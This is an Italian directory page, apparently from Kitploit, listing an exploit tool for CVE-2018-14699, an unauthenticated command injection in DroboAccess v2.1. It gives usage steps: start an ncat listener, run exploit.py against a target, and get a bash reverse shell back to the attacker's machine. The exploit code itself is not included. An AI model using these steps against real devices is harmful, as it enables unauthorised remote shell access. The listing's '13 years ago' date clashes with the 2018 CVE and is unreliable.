Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-14699 — Iniezione di comando cieco non autenticata nella funzione enable_user di DroboAccess v 2.1 | Kitploit
Strumenti/GitHubGitHub/revocain/cve-2018-14699
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubrevocain/cve-2018-14699

CVE-2018-14699

Iniezione di comando cieco non autenticata nella funzione enable_user di DroboAccess v 2.1

Vedi Repository
13 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2018-14699

Iniezione di comandi non autenticata nella funzione enable_user di DroboAccess v2.1


Utilizzo:

  • Per utilizzarlo, avviare prima un listener (ncat -nvlp 1337)

  • Poi eseguire l'exploit

    • esempio: exploit.py -t 192.168.1.122:8080 -l 192.168.1.2 -p 1337

    '-t', '--target', help='host per lo sfruttamento, es. 192.168.1.122:8080',required=True

    '-l', '--listener-ip', help='IP del listener', required=True

    '-p', '--port', help='numero di porta del listener', required=True

Descrizione:

CVE-2018-14699 è una vulnerabilità di iniezione di comandi cieca in DroboAccess v2.1. Il problema è dovuto al fatto che la funzione enable_user prende i parametri del nome utente come input utente, quindi chiama una dipendenza che esegue direttamente una shell senza alcuna sanificazione. Chiarisco ciò poiché non sembra esserci un'altra referenza di questo problema da nessuna parte. Quindi, ancora una volta, non si tratta di una vulnerabilità in Drobo 5N2, ma di una vulnerabilità in DroboAccess. È stata testata con successo su un B810n.

Dettagli

Lo script tenterà di inviare un echo di uno script in un file chiamato revshell nella directory di lavoro corrente. Se ha successo, tenterà quindi di chiamarlo con bash come eseguibile, effettuando una connessione di ritorno al tuo listener con bash!

Risorse:

  • https://blog.securityevaluators.com/call-me-a-doctor-new-vulnerabilities-in-drobo5n2-4f1d885df7fc
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14699
Scarica lo strumento